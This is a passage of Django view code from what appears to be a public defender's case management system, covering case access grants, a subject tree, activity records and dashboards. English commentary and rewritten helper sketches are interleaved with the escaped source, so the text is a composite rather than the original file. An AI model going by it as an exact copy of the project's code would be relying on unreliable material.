atual!' 
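The page-fallback pattern used by listar_atendimento_documentos_pendentes above recurs in list views like this one; a hedged sketch factoring it into a helper (the function name is invented, the behaviour mirrors the view):

from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator

def paginar(queryset, page, por_pagina=25):
    # Falls back to page 1 on a non-numeric page number, and to the last
    # page when the requested page is past the end, exactly as the view does.
    paginacao = Paginator(queryset, por_pagina)
    try:
        return paginacao.page(page)
    except PageNotAnInteger:
        return paginacao.page(1)
    except EmptyPage:
        return paginacao.page(paginacao.num_pages)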
% secundario.numero)\r\n\r\n else:\r\n\r\n messages.error(request, u'Não foi possível unificar atendimentos!')\r\n\r\n return redirect('atendimento_atender', atendimento_principal)\r\n\r\n\r\n@login_required\r\ndef visualizar_acesso(request):\r\n defensor = request.user.servidor.defensor if hasattr(request.user.servidor, 'defensor') else None\r\n\r\n if defensor:\r\n defensorias = defensor.atuacoes(vigentes=True).values('defensoria_id')\r\n\r\n meus_atendimentos = Acesso.objects.filter(\r\n (\r\n (\r\n Q(atendimento__defensor__defensoria__in=defensorias) &\r\n Q(atendimento__ativo=True)\r\n ) |\r\n (\r\n\r\n Q(atendimento__retorno__defensor__defensoria__in=defensorias) &\r\n ~Q(atendimento__retorno__data_atendimento=None) &\r\n Q(atendimento__retorno__ativo=True)\r\n )\r\n ),\r\n data_revogacao=None,\r\n ativo=True\r\n ).distinct().order_by('-data_concessao')\r\n\r\n outros_atendimentos = Acesso.objects.filter(\r\n defensor=defensor,\r\n data_revogacao=None,\r\n ativo=True\r\n ).order_by('-data_concessao')\r\n\r\n angular = 'AcessoCtrl'\r\n\r\n return render(request=request, template_name=\"atendimento/acessos.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef listar_acesso(request, atendimento_numero):\r\n atendimento = Atendimento.objects.get(numero=atendimento_numero)\r\n resposta = {\r\n 'publico': bool(atendimento.acesso_publico()),\r\n 'historico': [],\r\n 'solicitacoes': [],\r\n 'concessoes': []\r\n }\r\n\r\n acessos = Acesso.objects.select_related(\r\n 'defensor__servidor',\r\n 'solicitado_por__servidor',\r\n 'concedido_por__servidor',\r\n 'revogado_por__servidor',\r\n ).filter(\r\n atendimento=atendimento.at_inicial,\r\n ativo=True\r\n ).order_by(\r\n 'defensor__servidor__nome',\r\n 'id'\r\n )\r\n\r\n for acesso in acessos:\r\n obj = {\r\n 'defensor': {\r\n 'id': acesso.defensor.id,\r\n 'nome': acesso.defensor.nome,\r\n } if acesso.defensor else None,\r\n 'data_solicitacao': Util.date_to_json(acesso.data_solicitacao),\r\n 'solicitado_por': {\r\n 'id': acesso.solicitado_por.id,\r\n 'nome': acesso.solicitado_por.nome,\r\n } if acesso.solicitado_por else None,\r\n 'data_concessao': Util.date_to_json(acesso.data_concessao),\r\n 'concedido_por': {\r\n 'id': acesso.concedido_por.id,\r\n 'nome': acesso.concedido_por.nome,\r\n } if acesso.concedido_por else None,\r\n 'data_revogacao': Util.date_to_json(acesso.data_revogacao),\r\n 'revogado_por': {\r\n 'id': acesso.revogado_por.id,\r\n 'nome': acesso.revogado_por.nome,\r\n } if acesso.revogado_por else None,\r\n 'concedido': True if acesso.data_concessao else False,\r\n }\r\n\r\n resposta['historico'].append(obj)\r\n\r\n if acesso.defensor and not acesso.data_revogacao:\r\n if acesso.data_concessao:\r\n resposta['concessoes'].append(obj)\r\n else:\r\n resposta['solicitacoes'].append(obj)\r\n\r\n return JsonResponse(resposta, safe=False)\r\n\r\n\r\n@login_required\r\ndef conceder_acesso_por_id(request, acesso_id):\r\n defensor = request.user.servidor.defensor if hasattr(request.user.servidor, 'defensor') else None\r\n\r\n if defensor:\r\n Acesso.objects.filter(\r\n id=acesso_id,\r\n data_concessao=None,\r\n data_revogacao=None\r\n ).update(\r\n data_concessao=datetime.now(),\r\n concedido_por=defensor\r\n )\r\n\r\n messages.success(request, u'Acesso ao atendimento concedido!')\r\n\r\n return redirect('atendimento_acesso_visualizar')\r\n\r\n\r\n@login_required\r\ndef conceder_acesso(request, atendimento_numero):\r\n dados = Dados(request.body)\r\n atendimento = Atendimento.objects.get(numero=atendimento_numero)\r\n\r\n if 
dados['defensor']:\r\n Acesso.conceder(atendimento.at_inicial, dados['defensor'], request.user.servidor.defensor)\r\n else:\r\n Acesso.conceder_publico(atendimento.at_inicial, request.user.servidor.defensor)\r\n\r\n return JsonResponse({'success': True})\r\n\r\n\r\n@login_required\r\ndef revogar_acesso_por_id(request, acesso_id):\r\n defensor = request.user.servidor.defensor if hasattr(request.user.servidor, 'defensor') else None\r\n\r\n if defensor:\r\n Acesso.objects.filter(\r\n id=acesso_id,\r\n data_revogacao=None\r\n ).update(\r\n data_revogacao=datetime.now(),\r\n revogado_por=defensor\r\n )\r\n\r\n messages.success(request, u'Acesso ao atendimento cancelado!')\r\n\r\n return redirect('atendimento_acesso_visualizar')\r\n\r\n\r\n@login_required\r\ndef revogar_acesso(request, atendimento_numero):\r\n dados = Dados(request.body)\r\n atendimento = Atendimento.objects.get(numero=atendimento_numero)\r\n\r\n if dados['defensor']:\r\n Acesso.revogar(atendimento.at_inicial, dados['defensor'], request.user.servidor.defensor)\r\n else:\r\n Acesso.revogar_publico(atendimento.at_inicial, request.user.servidor.defensor)\r\n\r\n return JsonResponse({'success': True})\r\n\r\n\r\n@login_required\r\ndef solicitar_acesso(request, atendimento_numero):\r\n dados = Dados(request.body)\r\n atendimento = Atendimento.objects.get(numero=atendimento_numero)\r\n\r\n Acesso.objects.update_or_create(\r\n atendimento=atendimento.at_inicial,\r\n defensor_id=dados['defensor'],\r\n data_concessao=None,\r\n data_revogacao=None,\r\n defaults={\r\n 'data_solicitacao': datetime.now(),\r\n 'solicitado_por': request.user.servidor.defensor\r\n })\r\n\r\n return JsonResponse({'success': True})\r\n\r\n\r\n@login_required\r\ndef assuntos_get(request):\r\n cache_key = 'assunto.listar:'\r\n cache_data = cache.get(cache_key)\r\n\r\n if not cache_data:\r\n\r\n assuntos = Assunto.objects.filter(ativo=True).order_by(\r\n 'pai', 'ordem'\r\n ).values(\r\n 'id', 'pai', 'ordem', 'titulo', 'descricao', 'codigo'\r\n )\r\n\r\n arr = {}\r\n\r\n # inicializa array\r\n for assunto in assuntos:\r\n arr[assunto['id']] = {\r\n 'id': assunto['id'],\r\n 'titulo': assunto['titulo'],\r\n 'descricao': assunto['descricao'],\r\n 'ordem': assunto['ordem'],\r\n 'pai': assunto['pai'],\r\n 'filhos': []\r\n }\r\n\r\n # vincula filhos aos pais\r\n for assunto in assuntos:\r\n if assunto['pai']:\r\n arr[assunto['pai']]['filhos'].append(str(assunto['id']))\r\n\r\n cache_data = arr\r\n cache.set(cache_key, cache_data)\r\n\r\n return JsonResponse(cache_data, safe=False)\r\n\r\n\r\n@login_required\r\ndef salvar_assunto(request):\r\n data = simplejson.loads(request.body)\r\n\r\n try:\r\n pai = Assunto.objects.get(id=data['pai']['id'])\r\n except ObjectDoesNotExist:\r\n pai = None\r\n\r\n assunto = Assunto(\r\n codigo=data['codigo'],\r\n titulo=data['titulo'],\r\n pai=pai,\r\n cadastrado_por=request.user.servidor,\r\n )\r\n\r\n if pai:\r\n assunto.ordem = pai.filhos.filter(ativo=True).count() + 1\r\n else:\r\n assunto.ordem = Assunto.objects.filter(ativo=True, pai=None).count() + 1\r\n\r\n assunto.save()\r\n\r\n return JsonResponse({'success': True}, safe=False)\r\n\r\n\r\n@login_required\r\ndef excluir_assunto(request):\r\n data = simplejson.loads(request.body)\r\n erro = False\r\n\r\n try:\r\n assunto = Assunto.objects.get(id=data['id'], ativo=True)\r\n except ObjectDoesNotExist:\r\n erro = 'Assunto não existe.'\r\n else:\r\n if assunto.atendimentos.count():\r\n erro = 'Este assunto já esta sendo utilizado em algum atendimento.'\r\n else:\r\n 
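assuntos_get above builds the cached subject tree in two passes: first index every row by id, then attach child ids to their parents. A framework-free sketch of that shape (the sample rows are invented):

def montar_arvore(assuntos):
    # Pass 1: one node per row, each with an empty child list.
    arr = {a["id"]: {**a, "filhos": []} for a in assuntos}
    # Pass 2: append each child's id (as a string, matching the view) to its parent.
    for a in assuntos:
        if a["pai"]:
            arr[a["pai"]]["filhos"].append(str(a["id"]))
    return arr

linhas = [
    {"id": 1, "pai": None, "titulo": "Civel"},
    {"id": 2, "pai": 1, "titulo": "Familia"},
]
assert montar_arvore(linhas)[1]["filhos"] == ["2"]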
Assunto.objects.filter(id=data['id']).update(ativo=False, excluido_por=request.user.servidor,\r\n data_exclusao=datetime.now())\r\n Assunto.objects.filter(pai=assunto.pai, ordem__gt=assunto.ordem, ativo=True).update(ordem=F('ordem') - 1)\r\n cache.delete('assunto.listar:')\r\n\r\n return JsonResponse({'success': not erro, 'erro': erro}, safe=False)\r\n\r\n\r\n@login_required\r\n@reversion.create_revision(atomic=False)\r\ndef mover_assunto(request):\r\n data = simplejson.loads(request.body)\r\n\r\n try:\r\n assunto = Assunto.objects.get(id=data['id'], ativo=True)\r\n irmao = Assunto.objects.get(pai=assunto.pai, ordem=assunto.ordem + data['posicao'], ativo=True)\r\n except ObjectDoesNotExist:\r\n return JsonResponse({'success': False, 'erro': 'Assunto e/ou irmão não existe(m).'}, safe=False)\r\n\r\n assunto.ordem = assunto.ordem + data['posicao']\r\n assunto.save()\r\n\r\n irmao.ordem = irmao.ordem - data['posicao']\r\n irmao.save()\r\n\r\n msg = 'Assunto \"{0}\" teve ordem {1} alterada para {2} com Irmão \"{3}\"'.format(\r\n assunto.titulo, irmao.ordem,\r\n assunto.ordem,\r\n irmao.titulo\r\n )\r\n reversion.set_user(request.user)\r\n\r\n reversion.set_comment(msg)\r\n\r\n return JsonResponse({'success': True}, safe=False)\r\n\r\n\r\n@login_required\r\ndef vincular_assuntos(request, atendimento_numero):\r\n assuntos = simplejson.loads(request.body)\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n atendimento.assuntos.clear()\r\n for assunto in assuntos:\r\n atendimento.assuntos.add(assunto)\r\n atendimento.save()\r\n return JsonResponse({'success': True, 'assuntos': assuntos})\r\n\r\n\r\n@never_cache\r\n@login_required\r\n@permission_required('atendimento.add_assunto')\r\n@permission_required('atendimento.change_assunto')\r\n@permission_required('atendimento.delete_assunto')\r\ndef assuntos_listar(request):\r\n angular = 'AssuntoCtrl'\r\n return render(request=request, template_name=\"atendimento/assunto/listar.html\", context=locals())\r\n\r\n\r\n@login_required\r\n@transaction.atomic\r\ndef salvar_atividade(request, atendimento_numero):\r\n\r\n if request.is_ajax():\r\n dados = simplejson.loads(request.body)\r\n else:\r\n dados = request.POST\r\n\r\n if 'atendimentos' in request.POST:\r\n atendimentos = request.POST.getlist('atendimentos')\r\n else:\r\n atendimentos = [atendimento_numero]\r\n\r\n resposta = None\r\n agora = datetime.now()\r\n\r\n for atendimento_numero in atendimentos:\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n atividade = AtendimentoDefensor(\r\n origem=atendimento,\r\n cadastrado_por=request.user.servidor,\r\n tipo=AtendimentoDefensor.TIPO_ATIVIDADE\r\n )\r\n\r\n if dados.get('finalizar'):\r\n atividade.finalizado_por = request.user.servidor.defensor\r\n atividade.data_finalizado = agora\r\n elif dados.get('reabrir'):\r\n atividade.finalizado_por = None\r\n atividade.data_finalizado = None\r\n atividade.data_atendimento = agora\r\n atendimento.data_atendimento = None\r\n atendimento.atendido_por = None\r\n atendimento.historico = None\r\n\r\n if atendimento.defensoria.nucleo.multidisciplinar:\r\n form = AtividadeForm(dados, instance=atividade)\r\n else:\r\n form = AtividadeDefensorForm(dados, instance=atividade)\r\n\r\n if form.is_valid():\r\n\r\n participantes = []\r\n\r\n # Se multidisciplinar, exije a seleção de pelo menos um participante\r\n if atendimento.defensoria.nucleo.multidisciplinar or atendimento.defensoria.nucleo.diligencia:\r\n\r\n participantes = 
request.POST.getlist('participantes')\r\n\r\n if not participantes:\r\n resposta = {\r\n 'success': False,\r\n 'message': u'Erro ao salvar a atividade, verifique se há participante selecionado!'}\r\n break\r\n\r\n atividade = form.save()\r\n\r\n # Adiciona participantes na atividade\r\n for servidor_id in participantes:\r\n\r\n # Verifica a partir da lotação dos participantes qual é o seu cargo\r\n atuacao = Atuacao.objects.filter(\r\n Q(defensor__servidor__id=servidor_id) &\r\n Q(data_inicial__lte=atividade.data_atendimento) &\r\n (\r\n Q(data_final=None) |\r\n Q(data_final__gte=atividade.data_atendimento)\r\n )\r\n ).only('cargo__id').first()\r\n\r\n cargo_id = None\r\n\r\n if atuacao:\r\n cargo_id = atuacao.cargo_id\r\n\r\n AtendimentoParticipante.objects.create(\r\n atendimento=atividade,\r\n servidor_id=servidor_id,\r\n cargo_id=cargo_id\r\n )\r\n\r\n # Valida valor do multiplicador de atividade\r\n if atendimento.multiplicador < 1 or not atendimento.qualificacao.multiplica_estatistica:\r\n atendimento.multiplicador = 1\r\n\r\n # Se flag 'finalizar' foi passada, registra a resposta do pedido de apoio como realizada\r\n if dados.get('finalizar'):\r\n\r\n # Copia informações da atividade para a resposta do pedido de apoio\r\n atendimento.historico = atividade.historico\r\n atendimento.atendido_por = request.user.servidor\r\n atendimento.data_atendimento = agora\r\n\r\n # Se for diligência salva o diligente que finalizou a atividade\r\n if atendimento.eh_diligencia:\r\n defensor_id = Defensor.objects.filter(servidor=request.user.servidor).values('id').first()\r\n\r\n if not atendimento.defensor_id == defensor_id['id']:\r\n atendimento.defensor_id = defensor_id['id']\r\n\r\n atendimento.save()\r\n\r\n tarefa = None\r\n resposta = None\r\n\r\n tarefa = atualiza_tarefa_atendimento_origem(\r\n atendimento=atendimento,\r\n resposta=atividade.historico,\r\n servidor=request.user.servidor,\r\n finalizar=True\r\n )\r\n\r\n if 'documentos' in request.POST:\r\n\r\n for documento in request.POST.getlist('documentos'):\r\n\r\n # vincula documento ao atendimento de resposta de apoio\r\n doc_original = AtendimentoDocumento.objects.get(id=documento)\r\n doc_original.id = None\r\n doc_original.atendimento = atendimento\r\n doc_original.save()\r\n\r\n # vincula documento à tarefa (se existir)\r\n if tarefa and resposta:\r\n # vincula arquivo a resposta da tarefa\r\n if doc_original.arquivo:\r\n resposta.documento = doc_original\r\n resposta.save()\r\n # vincula documento online a tarefa\r\n elif doc_original.documento_online:\r\n tarefa.documentos.add(doc_original.documento_online)\r\n\r\n elif dados.get('reabrir'):\r\n\r\n atendimento.save()\r\n\r\n atualiza_tarefa_atendimento_origem(\r\n atendimento=atendimento,\r\n resposta='Solicitação de apoio reaberta',\r\n servidor=request.user.servidor,\r\n reabrir=True\r\n )\r\n\r\n # recupera documento do pedido que também esteja vinculado a um processo\r\n if atendimento.origem:\r\n\r\n documento = atendimento.origem.documento_set.exclude(\r\n documento_online__core_documentos=None\r\n ).first()\r\n\r\n # se existir vinculo com processo, devolve para setor solicitante\r\n if documento:\r\n\r\n processo = documento.documento_online.core_documentos.first().processo\r\n evento = processo.eventos.ativos().tipo_encaminhamento().ordem_decrescente().first()\r\n sucesso, evento = processo.encaminhar(setor_encaminhado=evento.setor_criacao)\r\n\r\n if evento:\r\n\r\n evento.historico = atendimento.historico\r\n evento.save()\r\n\r\n # adiciona documentos da resposta da 
diligência\r\n for documento in atendimento.documento_set.ativos():\r\n CoreDocumento.objects.create(\r\n processo=processo,\r\n evento=evento,\r\n documento=documento.documento_online,\r\n arquivo=documento.arquivo,\r\n nome=documento.nome,\r\n tipo=CoreTipoDocumento.objects.first(), # todo: tipo padrao\r\n )\r\n\r\n # limpa árvore de atendimento para atualização de dados\r\n if hasattr(atendimento.at_inicial, 'arvore'):\r\n atendimento.at_inicial.arvore.ativo = False\r\n atendimento.at_inicial.arvore.save()\r\n\r\n resposta = {'success': True, 'atividade': Util.object_to_dict(atividade)}\r\n\r\n else:\r\n\r\n resposta = {\r\n 'success': False,\r\n 'message': u'Erro ao salvar a atividade, verifique se todos campos foram preenchidos corretamente!'}\r\n break\r\n\r\n if request.is_ajax():\r\n\r\n resposta = JsonResponse(resposta)\r\n\r\n else:\r\n\r\n if not resposta.get('success'):\r\n messages.error(request, resposta.get('message'))\r\n\r\n if dados.get('next'):\r\n resposta = redirect(dados.get('next'))\r\n else:\r\n resposta = redirect('{}#/atividades'.format(reverse('atendimento_atender', args=[atendimento.numero])))\r\n\r\n return resposta\r\n\r\n\r\n@login_required\r\ndef get_resumo_atividade(request, atendimento_numero):\r\n\r\n atendimento = AtendimentoDefensor.objects.filter(\r\n numero=atendimento_numero,\r\n tipo=Atendimento.TIPO_NUCLEO,\r\n remarcado=None,\r\n ativo=True).first()\r\n\r\n if atendimento:\r\n\r\n if atendimento.realizado:\r\n situacao = 'Realizado'\r\n elif atendimento.atividades.exists():\r\n situacao = 'Em andamento'\r\n elif atendimento.participantes.exists():\r\n situacao = 'Distribuído'\r\n else:\r\n situacao = 'Agendado'\r\n\r\n resposta = {\r\n 'situacao': situacao,\r\n 'atividades': [{\r\n 'data_atendimento': atividade.data_atendimento,\r\n 'qualificacao': atividade.qualificacao.titulo,\r\n 'historico': atividade.historico,\r\n } for atividade in atendimento.atividades.order_by('-data_atendimento')],\r\n 'documentos': [{\r\n 'id': documento.id,\r\n 'nome': documento.nome,\r\n 'arquivo': {\r\n 'url': documento.arquivo.url,\r\n } if documento.arquivo else None,\r\n 'documento_online': {\r\n 'identificador_versao': documento.documento_online.identificador_versao,\r\n 'url': reverse('documentos:validar-detail', kwargs={'slug': documento.documento_online.pk_uuid})\r\n } if documento.documento_online else None,\r\n } for documento in atendimento.documentos.filter(atendimento=atendimento)]\r\n }\r\n\r\n return JsonResponse({'success': True, 'resumo': resposta})\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\nclass VincularDocumentoTarefa(VincularDocumentoBaseView):\r\n model = Tarefa\r\n documents_field_name = 'documentos'\r\n\r\n def vinculate(self):\r\n with transaction.atomic():\r\n super(VincularDocumentoTarefa, self).vinculate() # salvei tarefa\r\n\r\n # colocar try except\r\n try:\r\n atendimento = AtendimentoDefensor.objects.get(id=self.object.atendimento_id)\r\n\r\n self.object = atendimento.defensoria\r\n self.documents_field_name = 'documentos'\r\n try:\r\n # vincula documento em atendimento.models.\r\n super(VincularDocumentoTarefa, self).vinculate()\r\n except Exception as e:\r\n logger.error(e)\r\n\r\n try:\r\n atendimento_documento, criado = AtendimentoDocumento.objects.get_or_create(\r\n atendimento=atendimento.at_inicial,\r\n documento_online=self.document_object,\r\n defaults={\r\n 'cadastrado_por': self.request.user.servidor,\r\n 'nome': self.document_object.assunto\r\n }\r\n )\r\n except Exception as e:\r\n logger.error(e)\r\n\r\n 
except AtendimentoDefensor.DoesNotExist as e:\r\n logger.error(e)\r\n\r\n\r\nclass AcompanhamentoIndex(TemplateView):\r\n template_name = 'atendimento/acompanhamento/index.html'\r\n\r\n def get_context_data(self, **kwargs):\r\n contexto = super(AcompanhamentoIndex, self).get_context_data(**kwargs)\r\n\r\n if hasattr(self.request.user.servidor, 'defensor'):\r\n defensor = self.request.user.servidor.defensor\r\n atuacoes_lst = defensor.atuacoes().filter(\r\n defensoria__evento=None\r\n ).vigentes()\r\n\r\n else:\r\n\r\n atuacoes_lst = Atuacao.objects.none()\r\n\r\n contexto['atuacoes_lst'] = atuacoes_lst\r\n contexto['Atuacao'] = Atuacao\r\n return contexto\r\n\r\n\r\nclass AcompanhamentoPainel(ListView):\r\n template_name = 'atendimento/acompanhamento/painel.html'\r\n context_object_name = 'atendimentos_lst'\r\n paginate_by = 15\r\n\r\n def get_queryset(self):\r\n\r\n # qs = super(AcompanhamentoIndex, self).get_queryset(request, *args, **kwargs)\r\n painel = self.kwargs.get('painel')\r\n\r\n if painel == 'sem-peca':\r\n atendimentos_lst = self.get_atendimento_sem_peca_queryset()\r\n elif painel == 'peca-digitada':\r\n atendimentos_lst = self.get_atendimento_peca_digitada_queryset()\r\n elif painel == 'peca-assinada':\r\n atendimentos_lst = self.get_atendimento_peca_assinada_queryset()\r\n elif painel == 'peticionado':\r\n atendimentos_lst = self.get_atendimento_peticionado_queryset()\r\n elif painel == \"sem-peca-juridica\":\r\n atendimentos_lst = self.get_atendimento_sem_peca_judicial_queryset()\r\n elif painel == \"peticionado-juridica\":\r\n atendimentos_lst = self.get_atendimento_peticionado_judicial_queryset()\r\n else:\r\n atendimentos_lst = AtendimentoDefensor.objects.none()\r\n\r\n return atendimentos_lst\r\n\r\n def get(self, request, *args, **kwargs):\r\n response_original = super(AcompanhamentoPainel, self).get(request, *args, **kwargs)\r\n\r\n return response_original\r\n\r\n def get_atendimento_queryset(self):\r\n\r\n defensoria = self.kwargs.get('defensoria_id')\r\n\r\n atendimentos = AtendimentoDefensor.objects.select_related(\r\n 'qualificacao__area'\r\n ).annotate(\r\n processos_judiciais=Sum(\r\n Case(\r\n When(\r\n parte__processo__tipo__in=[Processo.TIPO_FISICO, Processo.TIPO_EPROC, Processo.TIPO_PAD],\r\n parte__ativo=True,\r\n then=Value(1)\r\n ),\r\n default=Value(0),\r\n output_field=IntegerField()))\r\n ).filter(\r\n ~Q(data_atendimento=None) &\r\n Q(Q(tipo=Atendimento.TIPO_INICIAL) | Q(tipo=Atendimento.TIPO_RETORNO)) &\r\n Q(ativo=True)\r\n ).order_by(\r\n '-data_atendimento', 'numero'\r\n )\r\n\r\n if defensoria:\r\n atendimentos = atendimentos.filter(\r\n defensoria=defensoria\r\n )\r\n\r\n return atendimentos\r\n\r\n def get_atendimento_sem_peca_queryset(self):\r\n return self.get_atendimento_queryset().annotate(\r\n pecas=Sum(\r\n Case(\r\n When(\r\n ~Q(documento__documento_online=None) &\r\n Q(documento__ativo=True),\r\n then=Value(1)\r\n ),\r\n default=Value(0),\r\n output_field=IntegerField())),\r\n ).filter(\r\n pecas=0,\r\n processos_judiciais=0\r\n )\r\n\r\n def get_atendimento_peca_digitada_queryset(self):\r\n return self.get_atendimento_queryset().filter(\r\n Q(documento__documento_online__esta_assinado=False) &\r\n Q(documento__ativo=True) &\r\n Q(processos_judiciais=0)\r\n ).distinct()\r\n\r\n def get_atendimento_peca_assinada_queryset(self):\r\n return self.get_atendimento_queryset().filter(\r\n Q(documento__documento_online__esta_assinado=True) &\r\n Q(documento__ativo=True) &\r\n Q(processos_judiciais=0)\r\n ).distinct()\r\n\r\n def 
get_atendimento_peticionado_queryset(self):\r\n return self.get_atendimento_queryset().filter(\r\n processos_judiciais__gt=0\r\n ).distinct()\r\n\r\n def get_atendimento_peticionado_judicial_queryset(self):\r\n start_date = datetime.today() - timedelta(days=30)\r\n end_date = datetime.today()\r\n q = Q(\r\n Q(exibir_no_painel_de_acompanhamento=True) &\r\n Q(parte__processo__data_cadastro__range=[start_date, end_date]) &\r\n Q(processos_judiciais__gt=0)\r\n )\r\n return self.get_atendimento_queryset().filter(q).distinct()\r\n\r\n def get_atendimento_sem_peca_judicial_queryset(self):\r\n q = Q(\r\n Q(exibir_no_painel_de_acompanhamento=True) &\r\n Q(retorno__isnull=True) &\r\n Q(processos_judiciais=0)\r\n )\r\n return self.get_atendimento_queryset().filter(q)\r\n\r\n def get_context_data(self, **kwargs):\r\n contexto = super(AcompanhamentoPainel, self).get_context_data(**kwargs)\r\n tipo_painel_de_acompanhamento = Defensoria.PAINEL_PADRAO\r\n painel = self.kwargs.get('painel')\r\n defensoria_id = self.kwargs.get('defensoria_id')\r\n exibir_botao_ocultar = False\r\n if defensoria_id:\r\n defensoria = Defensoria.objects.get(id=defensoria_id)\r\n tipo_painel_de_acompanhamento = defensoria.tipo_painel_de_acompanhamento\r\n\r\n if tipo_painel_de_acompanhamento == Defensoria.PAINEL_SIMPLIFICADO:\r\n # sem_peca = self.get_atendimento_sem_peca_queryset()\r\n sem_peca_juridica_count = self.get_atendimento_sem_peca_judicial_queryset().count()\r\n # peticionado = self.get_atendimento_peticionado_queryset()\r\n peticionado_juridica_count = self.get_atendimento_peticionado_judicial_queryset().count()\r\n\r\n dados_painel_totais = [\r\n {\r\n 'texto': 'Atendimentos Aguardando Peça Processual Judicial',\r\n 'valor': sem_peca_juridica_count,\r\n 'icone': 'fas fa-clock',\r\n 'cor': 'bg-red',\r\n 'url': reverse(\r\n 'atendimento_acompanhamento_defensoria_painel',\r\n kwargs={'defensoria_id': defensoria.id, 'painel': 'sem-peca-juridica'}),\r\n 'selecionado': painel == \"sem-peca-juridica\"\r\n },\r\n {\r\n 'texto': 'Atendimentos com Peça Judiciais Protocolada nos Últimos 30 dias',\r\n 'valor': peticionado_juridica_count,\r\n 'icone': 'fas fa-check-circle',\r\n 'cor': 'bg-blue',\r\n 'url': reverse(\r\n 'atendimento_acompanhamento_defensoria_painel',\r\n kwargs={'defensoria_id': defensoria.id, 'painel': 'peticionado-juridica'}),\r\n 'selecionado': painel == \"peticionado-juridica\",\r\n },\r\n ]\r\n else:\r\n # sem_peca = self.get_atendimento_sem_peca_queryset()\r\n sem_peca_count = self.get_atendimento_sem_peca_queryset().count()\r\n\r\n # peca_digitada = self.get_atendimento_peca_digitada_queryset()\r\n peca_digitada_count = self.get_atendimento_peca_digitada_queryset().count()\r\n\r\n # peca_assinada = self.get_atendimento_peca_assinada_queryset()\r\n peca_assinada_count = self.get_atendimento_peca_assinada_queryset().count()\r\n\r\n # peticionado = self.get_atendimento_peticionado_queryset()\r\n peticionado_count = self.get_atendimento_peticionado_queryset().count()\r\n\r\n dados_painel_totais = [\r\n {\r\n 'texto': 'Atendimentos sem Peça',\r\n 'valor': sem_peca_count,\r\n 'icone': 'fas fa-clock',\r\n 'cor': 'bg-red',\r\n 'url': reverse(\r\n 'atendimento_acompanhamento_defensoria_painel',\r\n kwargs={'defensoria_id': defensoria.id, 'painel': 'sem-peca'}),\r\n 'selecionado': painel == \"sem-peca\",\r\n },\r\n {\r\n 'texto': 'Peças Digitadas',\r\n 'valor': peca_digitada_count,\r\n 'icone': 'fas fa-file-alt',\r\n 'cor': 'bg-yellow',\r\n 'url': reverse(\r\n 'atendimento_acompanhamento_defensoria_painel',\r\n 
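A hedged aside on get_atendimento_queryset above: the Sum(Case(When(...), default=Value(0))) counter is the pre-Django-2.0 idiom for a conditional count; on Django 2.0+ the same annotation can be spelled with a filtered aggregate. AtendimentoDefensor and Processo are the models already used by the queryset methods above; this is a sketch, not the source's code:

from django.db.models import Count, Q

atendimentos = AtendimentoDefensor.objects.annotate(
    processos_judiciais=Count(
        'parte',
        filter=Q(
            parte__processo__tipo__in=[Processo.TIPO_FISICO, Processo.TIPO_EPROC, Processo.TIPO_PAD],
            parte__ativo=True,
        ),
    )
)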
kwargs={'defensoria_id': defensoria.id, 'painel': 'peca-digitada'}),\r\n 'selecionado': painel == \"peca-digitada\",\r\n },\r\n {\r\n 'texto': 'Peças Assinadas',\r\n 'valor': peca_assinada_count,\r\n 'icone': 'fas fa-edit',\r\n 'cor': 'bg-blue',\r\n 'url': reverse(\r\n 'atendimento_acompanhamento_defensoria_painel',\r\n kwargs={'defensoria_id': defensoria.id, 'painel': 'peca-assinada'}),\r\n 'selecionado': painel == \"peca-assinada\",\r\n },\r\n {\r\n 'texto': 'Peças Protocoladas',\r\n 'valor': peticionado_count,\r\n 'icone': 'fas fa-check-circle',\r\n 'cor': 'bg-green',\r\n 'url': reverse(\r\n 'atendimento_acompanhamento_defensoria_painel',\r\n kwargs={'defensoria_id': defensoria.id, 'painel': 'peticionado'}),\r\n 'selecionado': painel == \"peticionado\",\r\n },\r\n ]\r\n\r\n if painel == 'sem-peca-juridica':\r\n exibir_botao_ocultar = True\r\n\r\n contexto['defensoria'] = defensoria\r\n contexto['painel'] = painel\r\n contexto['exibir_botao_ocultar'] = exibir_botao_ocultar\r\n contexto['totais'] = dados_painel_totais\r\n contexto['Atendimento'] = AtendimentoDefensor\r\n return contexto\r\n\r\n\r\ndef atendimento_indeferimento_form(request, atendimento_numero, classe_tipo, form_id, form_action):\r\n\r\n atendimento = get_object_or_404(AtendimentoDefensor, numero=atendimento_numero, ativo=True)\r\n\r\n classes = CoreClasse.objects.ativos().order_by(\r\n 'nome_norm'\r\n ).distinct(\r\n 'nome_norm'\r\n ).filter(\r\n tipo=classe_tipo\r\n )\r\n\r\n q = Q(ativo=True)\r\n q &= Q(all_atuacoes__tipo=Atuacao.TIPO_TITULARIDADE)\r\n q &= Q(all_atuacoes__ativo=True)\r\n\r\n if classe_tipo == CoreClasse.TIPO_IMPEDIMENTO:\r\n q &= Q(nucleo__indeferimento_pode_receber_impedimento=True)\r\n elif classe_tipo == CoreClasse.TIPO_SUSPEICAO:\r\n q &= Q(nucleo__indeferimento_pode_receber_suspeicao=True)\r\n elif classe_tipo == CoreClasse.TIPO_NEGACAO:\r\n q &= Q(nucleo__indeferimento_pode_receber_negacao=True)\r\n\r\n setores = Defensoria.objects.filter(\r\n q\r\n ).order_by(\r\n 'numero',\r\n 'nome',\r\n 'comarca__nome'\r\n )\r\n\r\n return render(\r\n request,\r\n template_name=\"atendimento/atender_modal_indeferimento_form.html\",\r\n context={\r\n 'atendimento': atendimento,\r\n 'classes': classes,\r\n 'setores': setores,\r\n 'form_id': form_id,\r\n 'form_action': form_action,\r\n })\r\n\r\n\r\n@login_required\r\ndef atendimento_indeferimento_impedimento_form(request, atendimento_numero):\r\n from indeferimento.forms import NovoImpedimentoForm\r\n\r\n atendimento = get_object_or_404(AtendimentoDefensor, numero=atendimento_numero, ativo=True)\r\n\r\n return render(\r\n request,\r\n template_name=\"atendimento/atender_modal_indeferimento_form.html\",\r\n context={\r\n 'atendimento': atendimento,\r\n 'form': NovoImpedimentoForm(atendimento=atendimento),\r\n 'form_id': 'ImpedimentoForm',\r\n 'form_action': reverse('indeferimento:novo_impedimento'),\r\n })\r\n\r\n\r\n@login_required\r\ndef atendimento_indeferimento_suspeicao_form(request, atendimento_numero):\r\n from indeferimento.forms import 